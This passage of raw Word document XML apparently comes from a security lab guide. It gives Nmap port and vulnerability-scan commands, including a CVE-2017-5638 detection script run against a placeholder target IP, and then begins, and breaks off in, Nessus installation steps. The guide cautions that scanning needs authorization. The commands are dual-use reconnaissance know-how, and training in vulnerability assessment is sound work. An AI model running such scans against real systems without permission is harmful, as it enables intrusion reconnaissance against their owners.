          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nmap -p- &lt;target IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 2: Once you have identified open ports, run a script scan using the -sC option to enable default scripts and the -sV option for version detection:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>php</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nmap -sC -sV -p&lt;ports&gt; &lt;target IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Step 3: Review the output and identify potential vulnerabilities or gather additional information about services. Here are some examples of useful Nmap scripts:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>http-vuln*: Detects various vulnerabilities in web servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>smb-vuln*: Identifies vulnerabilities in the SMB protocol.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ftp*: Performs various FTP-related checks and information gathering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>ssl-enum-ciphers: Lists supported SSL/TLS ciphers and protocols.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>smtp*: Gathers information about the SMTP service.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>mysql*: Retrieves information from MySQL servers.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>snmp*: Performs SNMP enumeration and information gathering.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>To include specific scripts, add the --script=&lt;script name&gt; option followed by the desired script name(s). For example:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>css</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Copy code</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>nmap -p80 --script=http-vuln-cve2017-5638 &lt;target IP&gt;</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Remember to adjust the target IP and ports according to your target system. Be cautious while scanning systems you don't own and ensure you have proper authorization before conducting any security assessments.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>Additionally, you can explore the Nmap Scripting Engine (NSE) documentation for a comprehensive list of available scripts and their usage:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t>https://nmap.org/book/nse.html</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00C31DE4" w:rsidRPr="004B2C8D" w:rsidRDefault="00C31DE4" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
        <w:t xml:space="preserve">Always prioritize responsible and ethical use of security tools and ensure compliance with relevant laws and regulations. </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74538" w:rsidRPr="004B2C8D" w:rsidRDefault="00A74538" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A74538" w:rsidRPr="004B2C8D" w:rsidRDefault="00A74538" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="00A74538" w:rsidRPr="00E83055" w:rsidRDefault="004B2C8D" w:rsidP="00E83055">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heme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00E83055">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:color w:val="0070C0"/>
          <w:sz w:val="52"/>
          <w:szCs w:val="52"/>
        </w:rPr>
        <w:t>Nessus:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:noProof/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="56D1933D" wp14:editId="410A7B67">
            <wp:extent cx="2857500" cy="800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ssus-reports.jpg"/>
                    <pic:cNvPicPr/>
                  </pic:nvPicPr>
                  <pic:blipFill>
                    <a:blip r:embed="rId22">
                      <a:extLst>
                        <a:ext uri="{28A0092B-C50C-407E-A947-70E740481C1C}">
                          <a14:useLocalDpi xmlns:a14="http://schemas.microsoft.com/office/drawing/2010/main" val="0"/>
                        </a:ext>
                      </a:extLst>
                    </a:blip>
                    <a:stretch>
                      <a:fillRect/>
                    </a:stretch>
                  </pic:blipFill>
                  <pic:spPr>
                    <a:xfrm>
                      <a:off x="0" y="0"/>
                      <a:ext cx="2857500" cy="800100"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="0083099E" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="0083099E" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">Install and configure Nessus, a vulnerability scanner, on the host </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="004B2C8D" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="004B2C8D">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="32"/>
          <w:szCs w:val="32"/>
        </w:rPr>
        <w:t xml:space="preserve">machine </w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="00A74538" w:rsidRPr="004B2C8D" w:rsidRDefault="00A74538" w:rsidP="00C31DE4">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>steps to install and configure Nessus, a vulnerability scanner, on your machine.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="31"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:b/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Nessus Installation Package:</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="006F2646">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:noProof/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0">
            <wp:extent cx="3253740" cy="1464183"/>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3-07-10 at 17.34.24.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78713" cy="1475421"/>
                    </a:xfrm>
                    <a:prstGeom prst="rect">
                      <a:avLst/>
                    </a:prstGeom>
                  </pic:spPr>
                </pic:pic>
              </a:graphicData>
            </a:graphic>
          </wp:inline>
        </w:drawing>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="006F2646" w:rsidRDefault="004B2C8D" w:rsidP="004B2C8D">
      <w:pPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:t>Visit the Tenable website (</w:t>
      </w:r>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:color w:val="00B0F0"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t xml:space="preserve">https://www.tenable.com/products/nessus) </w:t>
      </w:r>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>and navigate to the Nessus product page.</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRPr="00D55DE4" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
        </w:numPr>
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="00D55DE4">
        <w:rPr>
          <w:rFonts w:asciiTheme="minorHAnsi" w:hAnsiTheme="minorHAnsi" w:cstheme="minorHAnsi"/>
          <w:sz w:val="28"/>
          <w:szCs w:val="28"/>
        </w:rPr>
        <w:t>Choose the appropriate version of Nessus based on your operating system (e.g., Windows, Linux, macOS).</w:t>
      </w:r>
    </w:p>
    <w:p w:rsidR="004B2C8D" w:rsidRDefault="004B2C8D" w:rsidP="00D55DE4">
      <w:pPr>
        <w:pStyle w:val="ListParagraph"/>
        <w:numPr>
          <w:ilvl w:val="0"/>
          <w:numId w:val="23"/>
